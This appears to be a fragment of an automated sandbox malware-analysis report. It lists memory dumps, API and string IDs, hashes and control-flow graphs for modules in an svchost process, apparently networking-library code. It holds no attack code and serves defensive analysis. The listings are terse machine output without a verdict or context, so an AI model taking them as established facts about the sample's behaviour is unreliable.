                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$CriticalSection$CloseHandleclosesocket$AddrByteCharInfoMultiWide_errno_strdupmemset$CancelCreateDeleteEnterEventInitializeLeaveObjectSingleWaitcallocmallocsocketswprintf_s
                                                                                            • String ID:
                                                                                            • API String ID: 416132278-0
                                                                                            • Opcode ID: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                                                                                            • Instruction ID: e5e759b752038a15952c99d90740afee588a2ec65688da9b42be74c008c124f2
                                                                                            • Opcode Fuzzy Hash: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                                                                                            • Instruction Fuzzy Hash: 05C1B23270AB8282E7589F21E46436973A2FF44B64F548235DA6E177E2DF3EE854C314

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1045 7ffda3782780-7ffda37827ef call 7ffda37645e0 call 7ffda3764600 1050 7ffda37827f1-7ffda37827f6 1045->1050 1051 7ffda37827fb-7ffda3782809 call 7ffda3782360 1045->1051 1052 7ffda3783010 1050->1052 1056 7ffda378280b-7ffda3782810 1051->1056 1057 7ffda3782815-7ffda3782828 call 7ffda3784530 1051->1057 1055 7ffda3783012-7ffda3783039 call 7ffda3795780 1052->1055 1056->1052 1057->1052 1062 7ffda378282e-7ffda3782838 1057->1062 1063 7ffda378284c-7ffda3782856 1062->1063 1064 7ffda378283a-7ffda378284a _strdup 1062->1064 1065 7ffda378286a-7ffda3782874 1063->1065 1066 7ffda3782858-7ffda3782868 _strdup 1063->1066 1064->1056 1064->1063 1067 7ffda3782876-7ffda3782886 _strdup 1065->1067 1068 7ffda3782895-7ffda37828a4 call 7ffda3783180 1065->1068 1066->1056 1066->1065 1067->1056 1070 7ffda3782888-7ffda378288f 1067->1070 1068->1052 1072 7ffda37828aa-7ffda37828b8 1068->1072 1070->1068 1073 7ffda37828ca-7ffda37828d4 1072->1073 1074 7ffda37828ba-7ffda37828c1 1072->1074 1076 7ffda378291f-7ffda378292e call 7ffda3783820 1073->1076 1077 7ffda37828d6-7ffda37828dd 1073->1077 1074->1073 1075 7ffda37828c3 1074->1075 1075->1073 1076->1052 1083 7ffda3782934-7ffda3782952 1076->1083 1077->1076 1078 7ffda37828df-7ffda3782919 call 7ffda3761920 call 7ffda3785ef0 1077->1078 1078->1056 1078->1076 1084 7ffda3782954-7ffda378295b 1083->1084 1085 7ffda378295d-7ffda3782964 1083->1085 1084->1085 1087 7ffda3782967-7ffda378296e 1084->1087 1085->1087 1089 7ffda3782970-7ffda3782980 _strdup 1087->1089 1090 7ffda3782986-7ffda378298d 1087->1090 1089->1056 1089->1090 1091 7ffda378298f-7ffda37829ac _strdup 1090->1091 1092 7ffda37829ae-7ffda37829b0 1090->1092 1091->1092 1092->1052 1093 7ffda37829b6-7ffda37829cc call 7ffda3783ce0 1092->1093 1093->1052 1096 7ffda37829d2-7ffda37829d9 1093->1096 1097 7ffda37829ef-7ffda37829f6 1096->1097 1098 7ffda37829db-7ffda37829e9 call 7ffda375b920 1096->1098 1100 
7ffda3782a0c-7ffda3782a13 1097->1100 1101 7ffda37829f8-7ffda3782a06 call 7ffda375b920 1097->1101 1098->1055 1098->1097 1103 7ffda3782a4a-7ffda3782a53 1100->1103 1104 7ffda3782a15-7ffda3782a20 call 7ffda375b920 1100->1104 1101->1055 1101->1100 1108 7ffda3782a6c-7ffda3782a73 1103->1108 1109 7ffda3782a55-7ffda3782a61 1103->1109 1104->1055 1116 7ffda3782a26-7ffda3782a2d 1104->1116 1112 7ffda3782a79-7ffda3782a80 1108->1112 1113 7ffda3782a75-7ffda3782a77 1108->1113 1109->1108 1111 7ffda3782a63-7ffda3782a6a 1109->1111 1111->1108 1114 7ffda3782a89-7ffda3782a97 1112->1114 1115 7ffda3782a82 1112->1115 1113->1112 1113->1114 1117 7ffda3782ab3-7ffda3782aba 1114->1117 1118 7ffda3782a99-7ffda3782aa6 1114->1118 1115->1114 1116->1103 1119 7ffda3782a2f-7ffda3782a41 call 7ffda3779870 1116->1119 1120 7ffda3782abc-7ffda3782ac2 1117->1120 1121 7ffda3782ac8-7ffda3782ad6 1117->1121 1118->1052 1128 7ffda3782aac 1118->1128 1119->1103 1129 7ffda3782a43 1119->1129 1120->1121 1125 7ffda3782b70-7ffda3782bb3 call 7ffda3790650 1121->1125 1126 7ffda3782adc-7ffda3782b00 call 7ffda373b5f0 1121->1126 1125->1052 1133 7ffda3782bb9-7ffda3782bd6 call 7ffda377f210 1125->1133 1137 7ffda3782b02-7ffda3782b19 call 7ffda3763f60 call 7ffda3739bc0 1126->1137 1138 7ffda3782b60-7ffda3782b6b call 7ffda3781a70 1126->1138 1128->1117 1129->1103 1140 7ffda3782beb-7ffda3782c1b call 7ffda377f2a0 1133->1140 1141 7ffda3782bd8-7ffda3782be6 call 7ffda37732e0 1133->1141 1137->1052 1152 7ffda3782b1f-7ffda3782b2e call 7ffda3784fd0 1137->1152 1138->1052 1150 7ffda3782c1d-7ffda3782c25 call 7ffda3773320 1140->1150 1151 7ffda3782c2a-7ffda3782c33 1140->1151 1141->1140 1150->1151 1154 7ffda3782cec-7ffda3782cfb 1151->1154 1155 7ffda3782c39-7ffda3782c60 call 7ffda373a3c0 1151->1155 1169 7ffda3782b44-7ffda3782b5b call 7ffda37803a0 1152->1169 1170 7ffda3782b30-7ffda3782b3f 1152->1170 1158 7ffda3782cfd-7ffda3782d04 1154->1158 1159 7ffda3782d0a-7ffda3782d11 1154->1159 1164 7ffda3782c62-7ffda3782c66 1155->1164 1165 7ffda3782caf-7ffda3782cb6 
1155->1165 1158->1159 1160 7ffda3782f4e-7ffda3782f5f 1158->1160 1159->1160 1161 7ffda3782d17-7ffda3782d38 call 7ffda3780810 1159->1161 1167 7ffda3782f71-7ffda3782f74 1160->1167 1168 7ffda3782f61-7ffda3782f68 1160->1168 1180 7ffda3782d3e-7ffda3782d4b 1161->1180 1181 7ffda3782f48 1161->1181 1171 7ffda3782c70-7ffda3782cad call 7ffda373a530 call 7ffda3781670 call 7ffda373a3c0 1164->1171 1176 7ffda3782ccb-7ffda3782cdd 1165->1176 1177 7ffda3782cb8-7ffda3782cc6 call 7ffda37732e0 1165->1177 1174 7ffda3782fed-7ffda378300b call 7ffda3743190 call 7ffda37825e0 1167->1174 1175 7ffda3782f76-7ffda3782f8b call 7ffda373a2b0 1167->1175 1168->1167 1173 7ffda3782f6a 1168->1173 1169->1138 1170->1052 1171->1165 1173->1167 1174->1052 1197 7ffda3782f91-7ffda3782f94 1175->1197 1198 7ffda378303a-7ffda3783042 1175->1198 1176->1154 1186 7ffda3782cdf-7ffda3782ce7 call 7ffda3773320 1176->1186 1177->1176 1188 7ffda3782d9f-7ffda3782dae 1180->1188 1189 7ffda3782d4d-7ffda3782d98 free * 2 1180->1189 1181->1160 1186->1154 1194 7ffda3782db4-7ffda3782e51 free * 4 1188->1194 1195 7ffda3782e58-7ffda3782ef6 free * 3 call 7ffda37825e0 1188->1195 1189->1188 1194->1195 1213 7ffda3782f01-7ffda3782f09 1195->1213 1214 7ffda3782ef8-7ffda3782eff 1195->1214 1197->1198 1204 7ffda3782f9a-7ffda3782f9e 1197->1204 1199 7ffda3783044-7ffda378304c call 7ffda3773320 1198->1199 1200 7ffda3783051-7ffda3783054 1198->1200 1199->1200 1206 7ffda3783082-7ffda3783091 call 7ffda37904b0 1200->1206 1207 7ffda3783056-7ffda3783061 call 7ffda373a870 1200->1207 1204->1198 1210 7ffda3782fa4-7ffda3782fba call 7ffda373a060 1204->1210 1206->1052 1225 7ffda3783097-7ffda37830ae call 7ffda3763f60 call 7ffda3739bc0 1206->1225 1207->1206 1224 7ffda3783063-7ffda3783071 call 7ffda373a130 1207->1224 1226 7ffda3782fbc-7ffda3782fc4 call 7ffda3773320 1210->1226 1227 7ffda3782fc9-7ffda3782fcf 1210->1227 1219 7ffda3782f14 1213->1219 1220 7ffda3782f0b-7ffda3782f12 1213->1220 1218 7ffda3782f18-7ffda3782f43 call 7ffda3743190 1214->1218 1235 
7ffda378310f-7ffda3783126 call 7ffda3781a70 call 7ffda3784fd0 1218->1235 1219->1218 1220->1218 1241 7ffda378314b-7ffda3783157 call 7ffda3743190 1224->1241 1242 7ffda3783077-7ffda378307d call 7ffda3781670 1224->1242 1225->1052 1249 7ffda37830b4-7ffda37830bb 1225->1249 1226->1227 1231 7ffda3782fd1-7ffda3782fdc call 7ffda3781670 1227->1231 1232 7ffda3782fde-7ffda3782fe8 call 7ffda3743190 1227->1232 1231->1200 1232->1174 1235->1052 1254 7ffda378312c-7ffda3783137 1235->1254 1241->1174 1242->1206 1252 7ffda37830e1-7ffda37830e8 1249->1252 1253 7ffda37830bd-7ffda37830c3 1249->1253 1252->1235 1256 7ffda37830ea-7ffda37830f1 1252->1256 1253->1252 1255 7ffda37830c5-7ffda37830da call 7ffda3743190 1253->1255 1257 7ffda378315c-7ffda3783162 call 7ffda3784cc0 1254->1257 1258 7ffda3783139-7ffda3783146 call 7ffda37394c0 1254->1258 1255->1252 1256->1235 1260 7ffda37830f3-7ffda3783108 call 7ffda3743190 1256->1260 1266 7ffda3783167-7ffda378316b 1257->1266 1258->1052 1260->1235 1266->1052 1268 7ffda3783171-7ffda378317b call 7ffda37394c0 1266->1268 1268->1052
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ($($NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                                            • API String ID: 0-3942307397
                                                                                            • Opcode ID: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                                                                                            • Instruction ID: c7a84f37bf8156692f9c2fc8b70b53308354d19894e3fa25bfa35c882315970e
                                                                                            • Opcode Fuzzy Hash: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                                                                                            • Instruction Fuzzy Hash: 46429521B0AB8297EB598F25A5203B97396FF45785F084135DE8E67792DF3EE890C304

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1395 7ffda3737ee0-7ffda3737f43 call 7ffda377f210 call 7ffda3738740 1400 7ffda3737fb5-7ffda3737fbc 1395->1400 1401 7ffda3737f45-7ffda3737f65 call 7ffda373b240 1395->1401 1402 7ffda3738374-7ffda37383b3 call 7ffda37432a0 call 7ffda3795780 1400->1402 1403 7ffda3737fc2-7ffda3737fc9 1400->1403 1413 7ffda3737f6b-7ffda3737fb0 _errno * 3 call 7ffda377a280 call 7ffda37430a0 1401->1413 1414 7ffda3738009-7ffda3738017 1401->1414 1405 7ffda3737fcf-7ffda3737fda 1403->1405 1406 7ffda3738364-7ffda3738367 closesocket 1403->1406 1410 7ffda373835f call 7ffda3764360 1405->1410 1411 7ffda3737fe0-7ffda3738004 call 7ffda3764360 call 7ffda3764960 * 2 1405->1411 1409 7ffda373836d 1406->1409 1409->1402 1410->1406 1411->1409 1413->1400 1419 7ffda3738047 1414->1419 1420 7ffda3738019-7ffda3738045 setsockopt 1414->1420 1421 7ffda373804e-7ffda373806a call 7ffda3743190 1419->1421 1420->1421 1431 7ffda3738071-7ffda3738075 1421->1431 1432 7ffda373806c-7ffda373806f 1421->1432 1433 7ffda37380da 1431->1433 1434 7ffda3738077-7ffda3738080 1431->1434 1432->1431 1432->1433 1436 7ffda37380dd-7ffda3738100 1433->1436 1434->1436 1437 7ffda3738082-7ffda37380ad setsockopt 1434->1437 1441 7ffda3738102-7ffda3738121 call 7ffda3787db0 1436->1441 1442 7ffda373813b-7ffda373813e 1436->1442 1437->1436 1439 7ffda37380af-7ffda37380d8 WSAGetLastError call 7ffda377a280 call 7ffda3743190 1437->1439 1439->1436 1453 7ffda373812f-7ffda3738139 1441->1453 1454 7ffda3738123-7ffda373812d 1441->1454 1443 7ffda3738140-7ffda3738165 getsockopt 1442->1443 1444 7ffda3738192-7ffda373819d 1442->1444 1448 7ffda3738171-7ffda373818c setsockopt 1443->1448 1449 7ffda3738167-7ffda373816f 1443->1449 1450 7ffda3738283-7ffda373828b 1444->1450 1451 7ffda37381a3-7ffda37381aa 1444->1451 1448->1444 1449->1444 1449->1448 1455 7ffda373828d-7ffda37382bb call 7ffda3764960 * 2 1450->1455 1456 7ffda37382d1 1450->1456 1451->1450 1457 
7ffda37381b0-7ffda37381de setsockopt 1451->1457 1453->1443 1454->1444 1486 7ffda37382bd-7ffda37382c0 1455->1486 1487 7ffda37382c2-7ffda37382c5 1455->1487 1463 7ffda37382d4-7ffda37382da 1456->1463 1460 7ffda37381e0-7ffda37381ed WSAGetLastError 1457->1460 1461 7ffda37381f2-7ffda3738266 call 7ffda3788020 * 2 WSAIoctl 1457->1461 1467 7ffda3738275-7ffda373827e call 7ffda3743190 1460->1467 1461->1450 1481 7ffda3738268-7ffda373826e WSAGetLastError 1461->1481 1464 7ffda37382e1-7ffda3738305 call 7ffda375b960 call 7ffda37378b0 1463->1464 1465 7ffda37382dc-7ffda37382df 1463->1465 1469 7ffda373831a-7ffda3738337 call 7ffda3768960 1464->1469 1485 7ffda3738307-7ffda373830a 1464->1485 1465->1464 1465->1469 1467->1450 1469->1402 1484 7ffda3738339-7ffda373835d call 7ffda37384b0 call 7ffda377f210 1469->1484 1481->1467 1484->1402 1485->1400 1489 7ffda3738310-7ffda3738315 1485->1489 1486->1463 1487->1456 1490 7ffda37382c7-7ffda37382cc 1487->1490 1489->1400 1490->1400
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errnosetsockopt$CounterIoctlPerformanceQueryclosesocketgetsockopthtonsinet_ntop
                                                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %qd: errno %d$Failed to set SO_KEEPALIVE on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                                            • API String ID: 2614696814-935189632
                                                                                            • Opcode ID: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                                                                                            • Instruction ID: 68707959e66b35883f6f345dba716f509e4eff32354f1113891c9c523e6a518d
                                                                                            • Opcode Fuzzy Hash: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                                                                                            • Instruction Fuzzy Hash: FAD1D132B0978292EB58CB21E4643BE7362FB49B84F104135EA5D67796DF7EE148C708

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1494 7ffda36f59c0-7ffda36f59ef GetFileAttributesA 1495 7ffda36f5a0a-7ffda36f5a0e 1494->1495 1496 7ffda36f59f1-7ffda36f5a05 GetLastError call 7ffda36f5dc0 1494->1496 1498 7ffda36f5a28-7ffda36f5a6c CreateFileA 1495->1498 1499 7ffda36f5a10-7ffda36f5a23 _errno 1495->1499 1501 7ffda36f5c10-7ffda36f5c2a call 7ffda36f6230 1496->1501 1502 7ffda36f5a83-7ffda36f5aba DeviceIoControl 1498->1502 1503 7ffda36f5a6e-7ffda36f5a7e GetLastError call 7ffda36f5dc0 1498->1503 1499->1501 1504 7ffda36f5b52-7ffda36f5b63 CloseHandle 1502->1504 1505 7ffda36f5ac0-7ffda36f5b34 _errno GetLastError FormatMessageA libintl_gettext __acrt_iob_func call 7ffda36f1ab0 LocalFree CloseHandle 1502->1505 1513 7ffda36f5c00-7ffda36f5c08 1503->1513 1510 7ffda36f5b3a-7ffda36f5b4d _errno 1504->1510 1511 7ffda36f5b65-7ffda36f5b95 WideCharToMultiByte 1504->1511 1505->1510 1510->1513 1515 7ffda36f5ba7-7ffda36f5bac 1511->1515 1516 7ffda36f5b97-7ffda36f5ba5 _errno 1511->1516 1513->1501 1517 7ffda36f5bfe 1515->1517 1518 7ffda36f5bae-7ffda36f5bb1 1515->1518 1516->1513 1517->1513 1518->1517 1519 7ffda36f5bb3-7ffda36f5bb7 1518->1519 1519->1517 1520 7ffda36f5bb9-7ffda36f5bbd 1519->1520 1520->1517 1521 7ffda36f5bbf-7ffda36f5bc3 1520->1521 1521->1517 1522 7ffda36f5bc5-7ffda36f5bd1 isalpha 1521->1522 1522->1517 1523 7ffda36f5bd3-7ffda36f5bd7 1522->1523 1523->1517 1524 7ffda36f5bd9-7ffda36f5bdd 1523->1524 1524->1517 1525 7ffda36f5bdf 1524->1525 1526 7ffda36f5be0-7ffda36f5be9 1525->1526 1526->1526 1527 7ffda36f5beb-7ffda36f5bfb memcpy 1526->1527 1527->1517
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$AttributesErrorFileLast
                                                                                            • String ID: could not get junction for "%s": %s
                                                                                            • API String ID: 3917093391-640641469
                                                                                            • Opcode ID: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                                                                                            • Instruction ID: 0a93418cdfc7fe2fa14ee760e28039638280345b44476d0375c2449d9cab4e7a
                                                                                            • Opcode Fuzzy Hash: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                                                                                            • Instruction Fuzzy Hash: 22619721B0FB8246F7609B20A96436967A2FB45774F486334DA6D23BD6CF3ED8148708

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1791 7ffda3751ac0-7ffda3751b0c 1792 7ffda3751b10-7ffda3751b17 1791->1792 1792->1792 1793 7ffda3751b19-7ffda3751b25 1792->1793 1794 7ffda3751b67-7ffda3751b83 1793->1794 1795 7ffda3751b27-7ffda3751b3d call 7ffda3779870 1793->1795 1797 7ffda3751b95-7ffda3751baa call 7ffda3752190 1794->1797 1798 7ffda3751b85-7ffda3751b90 call 7ffda37732e0 1794->1798 1803 7ffda3751b53-7ffda3751b62 call 7ffda37430a0 1795->1803 1804 7ffda3751b3f-7ffda3751b51 call 7ffda3779870 1795->1804 1805 7ffda3751bac-7ffda3751bc5 call 7ffda3743190 1797->1805 1806 7ffda3751bc8-7ffda3751bcf 1797->1806 1798->1797 1818 7ffda3751fec 1803->1818 1804->1794 1804->1803 1805->1806 1810 7ffda3751bd1-7ffda3751bd9 call 7ffda3773320 1806->1810 1811 7ffda3751bde-7ffda3751be2 1806->1811 1810->1811 1816 7ffda3751fe1-7ffda3751fe9 1811->1816 1817 7ffda3751be8-7ffda3751bf2 1811->1817 1816->1818 1820 7ffda3751bf4-7ffda3751c22 call 7ffda3764960 * 2 1817->1820 1821 7ffda3751c28-7ffda3751c3e inet_pton 1817->1821 1819 7ffda3751fef-7ffda3752015 call 7ffda3795780 1818->1819 1820->1821 1839 7ffda3751fbe-7ffda3751fc3 1820->1839 1823 7ffda3751c40-7ffda3751c44 1821->1823 1824 7ffda3751c46-7ffda3751c5c inet_pton 1821->1824 1827 7ffda3751c66-7ffda3751c79 call 7ffda373fe40 1823->1827 1828 7ffda3751c62 1824->1828 1829 7ffda3751ce7-7ffda3751cef 1824->1829 1827->1839 1840 7ffda3751c7f-7ffda3751c87 1827->1840 1828->1827 1832 7ffda3751cf1-7ffda3751cff 1829->1832 1833 7ffda3751d30-7ffda3751d41 call 7ffda3779870 1829->1833 1835 7ffda3751d01-7ffda3751d16 call 7ffda3751460 1832->1835 1836 7ffda3751d1c-7ffda3751d2a 1832->1836 1848 7ffda3751dd7-7ffda3751dde 1833->1848 1849 7ffda3751d47-7ffda3751d4e 1833->1849 1835->1836 1836->1833 1836->1839 1839->1819 1845 7ffda3751c89-7ffda3751c97 call 7ffda37732e0 1840->1845 1846 7ffda3751c9c-7ffda3751cbe call 7ffda3750ee0 1840->1846 1845->1846 1861 7ffda3751cd1-7ffda3751cd4 1846->1861 1862 
7ffda3751cc0-7ffda3751ccd call 7ffda3773320 1846->1862 1850 7ffda3751de0-7ffda3751de9 1848->1850 1853 7ffda3751d50-7ffda3751d57 1849->1853 1850->1850 1854 7ffda3751deb-7ffda3751e22 htons inet_pton 1850->1854 1853->1853 1855 7ffda3751d59-7ffda3751d5d 1853->1855 1859 7ffda3751e24-7ffda3751e27 1854->1859 1860 7ffda3751e2c-7ffda3751e47 calloc 1854->1860 1857 7ffda3751d5f-7ffda3751d7a call 7ffda37798e0 1855->1857 1858 7ffda3751d7c-7ffda3751d7f 1855->1858 1857->1848 1857->1858 1867 7ffda3751d81-7ffda3751d88 1858->1867 1868 7ffda3751da7-7ffda3751db4 call 7ffda3752630 1858->1868 1863 7ffda3751f7a-7ffda3751f7d 1859->1863 1869 7ffda3751e51-7ffda3751e8a 1860->1869 1870 7ffda3751e49-7ffda3751e4c 1860->1870 1865 7ffda3751fd3-7ffda3751fdc call 7ffda37523f0 1861->1865 1866 7ffda3751cda-7ffda3751ce2 call 7ffda373fc60 1861->1866 1862->1861 1863->1840 1872 7ffda3751f83-7ffda3751f86 1863->1872 1865->1816 1866->1816 1867->1868 1876 7ffda3751d8a-7ffda3751da2 call 7ffda3744170 1867->1876 1868->1839 1889 7ffda3751dba-7ffda3751dc7 call 7ffda3750ed0 1868->1889 1877 7ffda3751e90-7ffda3751e9f 1869->1877 1870->1863 1872->1816 1880 7ffda3751f88-7ffda3751f99 1872->1880 1876->1863 1877->1877 1883 7ffda3751ea1-7ffda3751ea8 1877->1883 1885 7ffda3751fa2 call 7ffda3732580 1880->1885 1886 7ffda3751f9b-7ffda3751fa0 call 7ffda3744310 1880->1886 1888 7ffda3751eb0-7ffda3751eb7 1883->1888 1895 7ffda3751fa7-7ffda3751fb0 1885->1895 1886->1895 1888->1888 1892 7ffda3751eb9-7ffda3751ece calloc 1888->1892 1898 7ffda3751dcc-7ffda3751dd2 1889->1898 1896 7ffda3751ed4-7ffda3751f08 htons inet_pton 1892->1896 1897 7ffda3751f77 1892->1897 1899 7ffda3751fb2-7ffda3751fb5 call 7ffda37523f0 1895->1899 1900 7ffda3751fba-7ffda3751fbc 1895->1900 1896->1897 1901 7ffda3751f0a-7ffda3751f5c 1896->1901 1897->1863 1898->1863 1899->1900 1900->1839 1903 7ffda3751fc5-7ffda3751fd1 1900->1903 1904 7ffda3751f60-7ffda3751f6f 1901->1904 1903->1816 1904->1904 1905 7ffda3751f71-7ffda3751f75 1904->1905 1905->1863
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                                            • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                                            • API String ID: 1960554822-2421204314
                                                                                            • Opcode ID: 25c6cb95df582e28cec119e56824c6f6e721cbceaf414b25f40c618f8d6cf66f
                                                                                            • Instruction ID: 021c10dd7a5de439bd8e5022caae3d6fdf95936e35aecab5ee68d33929f07d93
                                                                                            • Opcode Fuzzy Hash: 25c6cb95df582e28cec119e56824c6f6e721cbceaf414b25f40c618f8d6cf66f
                                                                                            • Instruction Fuzzy Hash: 0DE1AF62B0A78285FF589B6195603BC37A2EB05B88F048235DE1E677C7DF3ED4568304
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 3053784475-0
                                                                                            • Opcode ID: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                                                                                            • Instruction ID: 708de0fecceb37848322adcba17870c4bb071851ece811acd75a4c63527e9781
                                                                                            • Opcode Fuzzy Hash: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                                                                                            • Instruction Fuzzy Hash: 1081CF22B19A8195FB608B64D4647FC3362AB49768F400731DE6D37BDAEF7AD1458304
